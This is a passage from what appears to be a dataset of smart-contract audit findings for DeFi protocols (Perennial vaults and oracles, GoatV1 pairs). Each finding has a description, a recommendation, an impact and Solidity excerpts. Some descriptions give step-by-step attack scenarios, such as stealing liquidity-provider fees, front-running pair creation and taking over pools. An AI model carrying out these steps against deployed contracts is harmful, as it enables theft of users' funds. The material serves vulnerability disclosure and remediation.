account in the assumption that it never reverts which is not true. This causes unpexpected reverts and denial of service to users who can not execute transactions in some situations, in particular:\\nOracle `KeeperFactory.settle` uses this method to settle all accounts in the market for the oracle verison and will revert entire market version's settlement if any account which is being settled is below margin requirement. Example scenario: 1.1. User increases position to the edge of margin requirement 1.2. The price rises slightly for the commited oracle version, and user position is settled and is now slightly below margin requirements 1.3. All attempts to settle accounts for the commited oracle version for this market will revert as user's account collateral is below margin requirements.\\nVault `Vault._updateUnderlying` uses this method to settle all vault's accounts in the markets. This function is called at the start of `rebalance` and `update`, with `rebalance` also being called before any admin vault parameters changes such as updating market leverages, weights or cap. This becomes especially problematic if any market is ""removed"" from the vault by setting its weight to 0, but the market still has some position due to `minPosition` limitation (as described in another issue). In such case each vault `update` will bring this market's position to exact edge of margin requirement, meaning a lot of times minimal price changes will put the vault's market account below margin requirement, and as such most Vault functions will revert (update, `rebalance` and admin param changes). Moreover, since the vault rebalances collateral and/or position size only in `_manage` (which is called only from `update` and rebalance), this means that the vault is basically bricked until this position is either liquidated or goes above margin requirement again due to price changes.\\nWhen `Market.update` is called, any parameters except `protected = true` will perform the following check from the InvariantLib.validate:\\n```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n\\nThis means that even updates which do not change anything (empty order and 0 collateral change) still perform this check and revert if the user's collateral is below margin requirement.\\nSuch method to settle accounts is used in KeeperOracle._settle:\\n```\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nThis is called from `KeeperFactory.settle`, which the keepers are supposed to call to settle market accounts after the oracle version is commited. This will revert, thus keepers will temporarily be unable to call this function for the specific oracle version until all users are at or above margin.\\nThe same method is used to settle accounts in Vault._updateUnderlying:\\n```\\nfunction _updateUnderlying() private {\\n for (uint256 marketId; marketId < totalMarkets; marketId++)\\n _registrations[marketId].read().market.update(\\n address(this),\\n UFixed6Lib.MAX,\\n UFixed6Lib.ZERO,\\n UFixed6Lib.ZERO,\\n Fixed6Lib.ZERO,\\n false\\n );\\n}\\n```\\n","Depending on intended functionality:\\nIgnore the margin requirement for empty orders and collateral change which is >= 0. AND/OR\\nUse `Market.settle` instead of `Market.update` to `settle` accounts, specifically in `KeeperOracle._settle` and in `Vault._updateUnderlying`. There doesn't seem to be any reason or issue to use `settle` instead of `update`, it seems that `update` is there just because there was no `settle` function available before.","Keepers are unable to settle market accounts for the commited oracle version until all accounts are above margin. The oracle fees are still taken from all accounts, but the keepers are blocked from receiving it.\\nIf any Vault's market weight is set to 0 (or if vault's position in any market goes below margin for whatever other reason), most of the time the vault will temporarily be bricked until vault's position in that market is liquidated. The only function working in this state is `Vault.settle`, even all admin functions will revert.","```\\nif (\\n !PositionLib.margined(\\n context.latestPosition.local.magnitude().add(context.pending.local.pos()),\\n context.latestOracleVersion,\\n context.riskParameter,\\n context.local.collateral\\n )\\n) revert IMarket.MarketInsufficientMarginError();\\n```\\n" +Vault checkpoints slightly incorrect conversion from assets to shares leads to slow loss of funds for long-time vault depositors,medium,"When vault checkpoints convert assets to shares (specifically used to calculate user's shares for their deposit), it uses the following formula: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\n`settlementFee` in this formula is taken into account slightly incorrectly: in actual market collateral calculations, both settlement fee and trade fee are subtracted from collateral, but this formula basically multiplies `1 - settlement fee percentage` by `1 - trade fee percentage`, which is slightly different and adds the calculation error = `settlement fee percentage * trade fee percentage`.\\nThis is the scenario to better understand the issue:\\nLinear fee = 2%, settlement fee = $1\\nUser1 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $97 (due to fees), User1 shares = 100\\nUser2 deposits $100 into the vault (linear fee = $2, settlement fee = $1)\\nVault assets = $194, User1 shares = 100, but User2 shares = 100.02, meaning User1's share value has slightly fallen due to a later deposit.\\nThis is the calculation for User2 shares: `shares = ($100 - $1) * 100/$97 * ($100 - $2) / $100 = $99 * 100/$97 * $98/$100 = $99 * 98/$97 = 100.02`\\nThe extra 0.02 this user has received is because the `tradeFee` is taken from the amount after settlement fee ($99) rather than full amount as it should ($100). This difference (settlementFee * `tradeFee` = $0.02) is unfair amount earned by User2 and loss of funds for User1.\\nWhen redeeming, the formula for shares -> assets vault checkpoint conversion is correct and the correct amount is redeemed.\\nThis issue leads to all vault depositors slowly losing share value with each deposit, and since no value is gained when redeeming, continuous deposits and redeems will lead to all long-time depositors continuously losing their funds.\\nThis is the formula for vault checkpoint toSharesGlobal:\\n```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n\\nThis code translates to a formula shown above, i.e. it first subtracts settlement fee from the assets (withoutSettlementFeeGlobal), then multiplies this by checkpoint's share value in `_toShares` (*checkpoint.shares/checkpoint.assets), and then multiplies this by trade fee adjustment in `_withSpread` (*(deposit+redeem-tradeFee) / (deposit+redeem)). Here is the formula again: `shares = (assets[before fee] - settlementFee) * checkpoint.shares/checkpoint.assets * (deposit + redeem - tradeFee) / (deposit + redeem)`\\nAs shown above, the formula is incorrect, because it basically does the following: `user_assets = (deposit - settlementFee) * (deposit - tradeFee)/deposit = deposit * (1 - settlementFeePct) * (1 - tradeFeePct)`\\nBut the actual user collateral after fees is calculated as: `user_assets = deposit - settlementFee - tradeFee = deposit * (1 - settlementFeePct - tradeFeePct)`\\nIf we subtract the actual collateral from the formula used in checkpoint, we get the error: `error = deposit * ((1 - settlementFeePct) * (1 - tradeFeePct) - (1 - settlementFeePct - tradeFeePct))` `error = deposit * settlementFeePct * tradeFeePct` `error = settlementFee * tradeFeePct`\\nSo this is systematic error, which inflates the shares given to users with any deposit by fixed amount of `settlementFee * tradeFeePct`",Re-work the assets to shares conversion in vault checkpoint to use the correct formula: `shares = (assets[before fee] - settlementFee - tradeFee * assets / (deposit + redeem)) * checkpoint.shares/checkpoint.assets`,"Any vault deposit reduces the vault assets by `settlementFee * tradeFeePct`. While this amount is not very large (in the order of $0.1 - $0.001 per deposit transaction), this is amount lost with each deposit, and given that an active vault can easily have 1000s of transactions daily, this will be a loss of $1-$100/day, which is significant enough to make it a valid issue.","```\\nfunction toSharesGlobal(Checkpoint memory self, UFixed6 assets) internal pure returns (UFixed6) {\\n // vault is fresh, use par value\\n if (self.shares.isZero()) return assets;\\n\\n // if vault is insolvent, default to par value\\n return self.assets.lte(Fixed6Lib.ZERO) ? assets : _toShares(self, _withoutSettlementFeeGlobal(self, assets));\\n}\\n\\nfunction _toShares(Checkpoint memory self, UFixed6 assets) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n return _withSpread(self, assets.muldiv(self.shares, selfAssets));\\n}\\n\\nfunction _withSpread(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 selfAssets = UFixed6Lib.unsafeFrom(self.assets);\\n UFixed6 totalAmount = self.deposit.add(self.redemption.muldiv(selfAssets, self.shares));\\n UFixed6 totalAmountIncludingFee = UFixed6Lib.unsafeFrom(Fixed6Lib.from(totalAmount).sub(self.tradeFee));\\n\\n return totalAmount.isZero() ?\\n amount :\\n amount.muldiv(totalAmountIncludingFee, totalAmount);\\n}\\n\\nfunction _withoutSettlementFeeGlobal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n return _withoutSettlementFee(amount, self.settlementFee);\\n}\\n\\nfunction _withoutSettlementFee(UFixed6 amount, UFixed6 settlementFee) private pure returns (UFixed6) {\\n return amount.unsafeSub(settlementFee);\\n}\\n```\\n" +ChainlinkFactory will pay non-requested versions keeper fees,medium,"Protocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.` But ChainlinkFactory ignores `numRequested`, which pays for both.\\nProtocol definition: `Requested versions will pay out a keeper fee, non-requested versions will not.`\\n```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n\\ncommit()->_handleKeeperFee()->_applicableValue() `ChainlinkFactory._applicableValue ()` implements the following:\\n```\\n function _applicableValue(uint256, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i++) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount += fee.amount;\\n }\\n return totalFeeAmount;\\n }\\n```\\n\\nThe above method ignores the first parameter `numRequested`. This way, whether it is `Requested versions` or not, you will pay `keeper fees`. Violating `non-requested versions will not pay`","It is recommended that only `Requested versions` keeper fees'\\n```\\n// Remove the line below\\n function _applicableValue(uint256 , bytes memory data) internal view override returns (uint256) {\\n// Add the line below\\n function _applicableValue(uint256 numRequested, bytes memory data) internal view override returns (uint256) {\\n bytes[] memory payloads = abi.decode(data, (bytes[]));\\n uint256 totalFeeAmount = 0;\\n for (uint256 i = 0; i < payloads.length; i// Add the line below\\n// Add the line below\\n) {\\n (, bytes memory report) = abi.decode(payloads[i], (bytes32[3], bytes));\\n (Asset memory fee, ,) = feeManager.getFeeAndReward(address(this), report, feeTokenAddress);\\n totalFeeAmount // Add the line below\\n= fee.amount;\\n }\\n// Remove the line below\\n return totalFeeAmount;\\n// Add the line below\\n return totalFeeAmount * numRequested / payloads.length ;\\n }\\n```\\n","If `non-requested versions` will pay as well, it is easy to maliciously submit `non-requested` maliciously consume `ChainlinkFactory` fees balance (Note that needs at least one numRequested to call `_handleKeeperFee()` )","```\\n /// @notice Commits the price to specified version\\n /// @dev Accepts both requested and non-requested versions.\\n /// Requested versions will pay out a keeper fee, non-requested versions will not.\\n /// Accepts any publish time in the underlying price message, as long as it is within the validity window,\\n /// which means its possible for publish times to be slightly out of order with respect to versions.\\n /// Batched updates are supported by passing in a list of price feed ids along with a valid batch update data.\\n /// @param ids The list of price feed ids to commit\\n /// @param version The oracle version to commit\\n /// @param data The update data to commit\\n function commit(bytes32[] memory ids, uint256 version, bytes calldata data) external payable {\\n```\\n" +Liquidity provider fees can be stolen from any pair,high,"An attacker can steal the liquidiy providers fees by transfering liquidity tokens to the pair and then withdrawing fees on behalf of the pair itself.\\nThis is possible because of two reasons:\\nTransfering liquidity tokens to the pair itself doesn't update the fee tracking variables:\\n```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n\\nwhich results in the variable `feesPerTokenPaid[address(pair)]` of the pair being equal to 0.\\nThe function withdrawFees() is a permissionless function that allows to withdraw fees on behalf of any address, including the pair itself.\\nBy combining this two quirks of the codebase an attacker can steal all of the currently pending liquidity provider fees by doing the following:\\nAdd liquidity to a pair, which will mint the attacker some liquidity tokens\\nTransfer the liquidity tokens to the pair directly\\nCall withdrawFees() by passing the address of the pair. Because `feesPerTokenPaid[address(pair)]` is 0 this will collect fees on behalf of the pair even if it shouldn't. The function will transfer an amount `x` of WETH from the pair to the pair itself and will lower the `_pendingLiquidityFee` variable by that same amount\\nBecause the variable `_pendingLiquidityFee` has been lowered by `x` the pool will assume someone transferred `x` WETH to it\\nAt this point the attacker can take advantage of this however he likes, but for the sake of the example let's suppose he calls swap() to swap `x` ETH into tokens that will be transferred to his wallet\\nThe attacker burns the liquidity transferred at point `2` to recover his funds\\nPOC\\n",In withdrawFees(pair) add a require statement to prevent fees being withdrawn on behalf of the pool.\\n```\\nrequire(to != address(this));\\n```\\n,Liquidity provider fees can be stolen from any pair.,```\\nif (to != address(this)) {\\n _updateFeeRewards(to);\\n}\\n```\\n +Some unusual problems arise in the use of the `GoatV1Factory.sol#createPair()` function.,medium,"If you create a new pool for tokens and add liquidity using the `GoatRouterV1.sol#addLiquidity()` function, the bootstrap function of the protocol is broken. Therefore, an attacker can perform the front running attack on the `GoatRouterV1.sol#addLiquidity()` function by front calling `GoatV1Factory.sol#createPair()`.\\nIf a pool for the token does not exist, the LP can create a new pool using the `GoatV1Factory.sol#createPair()` function. Next he calls `GoatRouterV1.sol#addLiquidity()` to provide liquidity. At this time, the amount of WETH and ERC20Token provided to the pool is calculated in the `GoatRouterV1.sol#_addLiquidity()` function.\\n```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n\\nFor simplicity, let's only consider from #L250 to #L256.\\nL250:wethReserve = virtualEth, tokenReserve = initialTokenMatch - (initialTokenMatch - ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) + + (virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2) = = ((virtualEth * initialTokenMatch)/(virtualEth + bootstrapEth)) - (virtualEthinitialTokenMatchbootstrapEth)/(virtualEth + bootstrapEth) ^ 2 L251:tokenAmountOptimal = wethDesired * wethReserve / tokenReserve vars.tokenAmount = tokenAmountOptimal vars.wethAmount = wethDesired\\nAt this time, At this time, the calculated balance of ETH and token is sent to the pool, and `GoatV1Pair(vars.pair).mint()` is called in the `GoatRouterV1.sol#addLiquidity()` function.\\n```\\n function addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n address to,\\n uint256 deadline,\\n GoatTypes.InitParams memory initParams\\n ) external nonReentrant ensure(deadline) returns (uint256, uint256, uint256) {\\n// rest of codeSNIP\\n IERC20(vars.token).safeTransferFrom(msg.sender, vars.pair, vars.actualTokenAmount);\\n if (vars.wethAmount != 0) {\\n IERC20(WETH).safeTransferFrom(msg.sender, vars.pair, vars.wethAmount);\\n }\\n vars.liquidity = GoatV1Pair(vars.pair).mint(to);\\n// rest of codeSNIP\\n }\\n```\\n\\nNext, the `GoatV1Pair(vars.pair).mint()` function checks the validity of the transmitted token.\\n```\\n function mint(address to) external nonReentrant returns (uint256 liquidity) {\\n // rest of codeSNIP\\n if (_vestingUntil == _MAX_UINT32) {\\n // Do not allow to add liquidity in presale period\\n if (totalSupply_ > 0) revert GoatErrors.PresalePeriod();\\n // don't allow to send more eth than bootstrap eth\\n if (balanceEth > mintVars.bootstrapEth) {\\n revert GoatErrors.SupplyMoreThanBootstrapEth();\\n }\\n\\n if (balanceEth < mintVars.bootstrapEth) {\\n (uint256 tokenAmtForPresale, uint256 tokenAmtForAmm) = _tokenAmountsForLiquidityBootstrap(\\n mintVars.virtualEth, mintVars.bootstrapEth, balanceEth, mintVars.initialTokenMatch\\n );\\n if (balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n liquidity =\\n Math.sqrt(uint256(mintVars.virtualEth) * uint256(mintVars.initialTokenMatch)) - MINIMUM_LIQUIDITY;\\n } else {\\n // This means that user is willing to make this pool an amm pool in first liquidity mint\\n liquidity = Math.sqrt(balanceEth * balanceToken) - MINIMUM_LIQUIDITY;\\n uint32 timestamp = uint32(block.timestamp);\\n _vestingUntil = timestamp + VESTING_PERIOD;\\n }\\n mintVars.isFirstMint = true;\\n }\\n // rest of codeSNIP\\n }\\n```\\n\\nIn here, `balanceToken = vars.tokenAmount (value:tokenAmountOptimal)` and `tokenAmtForPresale + tokenAmtForAmm` is calculated follows.\\ntokenAmtForPresale = initialTokenMatch - (virtualEth * initialTokenMatch / (virtualEth + bootstrapEth)) - - (balanceEth(value:wethDesired)*initialTokenMatch/(virtualEth+balanceEth)) tokenAmtForAmm = (virtualEth * initialTokenMatch * bootstrapEth) / (virtualEth + bootstrapEth) ^ 2\\nAs a result, `(balanceToken != (tokenAmtForPresale + tokenAmtForAmm)) == true`, the `GoatRouterV1.sol#addLiquidity()` function is reverted. In this case, If the initial LP want to provide liquidity to the pool, he must pay an amount of WETH equivalent to bootstrapEth to execute #L146. As a result, the bootstrap function is broken.\\nBased on this fact, an attacker can front run the `createPair()` function if he finds the `addLiquidity()` function in the mempool.",It is recommended that the `GoatV1Factory.sol#.createPair()` function be called only from the `GoatRouterV1` contract.,The bootstrap function of the protocol is broken and the initial LP must pay an amount of WETH equivalent to bootstrapEth.,"```\\n function _addLiquidity(\\n address token,\\n uint256 tokenDesired,\\n uint256 wethDesired,\\n uint256 tokenMin,\\n uint256 wethMin,\\n GoatTypes.InitParams memory initParams\\n ) internal returns (uint256, uint256, bool) {\\n GoatTypes.LocalVariables_AddLiquidity memory vars;\\n GoatV1Pair pair = GoatV1Pair(GoatV1Factory(FACTORY).getPool(token));\\n if (address(pair) == address(0)) {\\n // First time liquidity provider\\n pair = GoatV1Pair(GoatV1Factory(FACTORY).createPair(token, initParams));\\n vars.isNewPair = true;\\n }\\n\\n if (vars.isNewPair) {\\n// rest of codeSNIP\\n } else {\\n /**\\n * @dev This block is accessed after the presale period is over and the pool is converted to AMM\\n */\\n (uint256 wethReserve, uint256 tokenReserve) = pair.getReserves();\\n uint256 tokenAmountOptimal = GoatLibrary.quote(wethDesired, wethReserve, tokenReserve);\\n if (tokenAmountOptimal <= tokenDesired) {\\n if (tokenAmountOptimal < tokenMin) {\\n revert GoatErrors.InsufficientTokenAmount();\\n }\\n (vars.tokenAmount, vars.wethAmount) = (tokenAmountOptimal, wethDesired);\\n } else {\\n uint256 wethAmountOptimal = GoatLibrary.quote(tokenDesired, tokenReserve, wethReserve);\\n assert(wethAmountOptimal <= wethDesired);\\n if (wethAmountOptimal < wethMin) revert GoatErrors.InsufficientWethAmount();\\n (vars.tokenAmount, vars.wethAmount) = (tokenDesired, wethAmountOptimal);\\n }\\n }\\n return (vars.tokenAmount, vars.wethAmount, vars.isNewPair);\\n }\\n```\\n" +No check for `initialEth` in `GoatV1Pair.takeOverPool()`.,medium,"GoatV1Pair.takeOverPool() only checks the amount of `token` for initialization, not `initialETH`.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n\\nAlthough there is a check for the amount of `token` at L481, if the caller sets `initParams.initialEth` to 0, it can easily pass L481 because a smaller `initParams.initialEth` results in a larger `localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew`. This is due to the fact that the former initial provider's `initialEth` does not have any effect in preventing takeovers.",There should be a check for `initParams.initialEth`.,A pool could be unfairly taken over because the former initial provider's `initialEth` does not have any effect in preventing takeovers.,"```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n" +Legitimate pools can be taken over and the penalty is not fair.,medium,"In GoatV1Pair.takeOverPool(), a malicious user can take over pool from a legitimate user, because the mechanism for identifying is incorrect. And the penalty mechanism is not fair.\\nGoatV1Pair.takeOverPool() function exists to avoid grief, because only one pool can be created for each token. Doc says ""They can then lower the amount of virtual Ether or Ether to be raised, but not make it higher."" about GoatV1Pair.takeOverPool(). However, there is no checking for the amount of virtual Ether. This made it possible that legitimate pools can be taken over by malicious users.\\nL481 and L496 checks the amount of tokens, but there is no check for virtual Ether or Ether to be raised. So, a malicious user can take over a legitimate pool without any cost. He can remove his cost by increasing the amount of virtual Ether or reserved Ether. Paying +10 percent token can do nothing with it. Furthermore, the old liquidity provider should pay 5% penalty. This is very unfair. Generally, a malicious user have no Ether reserved. So, it is only harmful to legitimate users.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n 